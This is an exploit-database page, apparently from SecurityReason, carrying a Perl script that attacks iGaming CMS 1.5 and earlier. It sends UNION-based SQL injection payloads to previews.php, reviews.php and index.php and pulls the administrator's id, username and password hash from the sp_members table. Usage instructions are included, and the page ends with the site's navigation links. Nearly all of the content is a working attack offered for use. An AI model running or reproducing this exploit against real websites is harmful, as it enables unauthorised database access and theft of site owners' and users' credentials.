iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit

Exploit Code :

#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ----------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($one,$two,$exec,$host,$http,$xxx,$view);

$view =
"'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,
6,7,8%20from%20sp_members%20WHERE%20id='1/*";
$exec =
"'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from
%20sp_members%20where%20id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http->agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);

if($host !~ /^http:\/\/(.+?)$/)
{
print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
print "[?] Usage: perl $0 http://[path]\n";
exit;
}
else
{
$one = $http->get($host.'/previews.php?browse='.$exec);
$two = $http->get($host.'/reviews.php?browse='.$exec);
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)
{
die "$1\n" if $one->content =~ /%(.+?)%/;
die "$1\n" if $two->content =~ /%(.+?)%/;
die "$1\n" if $xxx->content =~ /%(.+?)%/;
}
else
{
die "[+] Exploit Failed!\n";
}
}

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason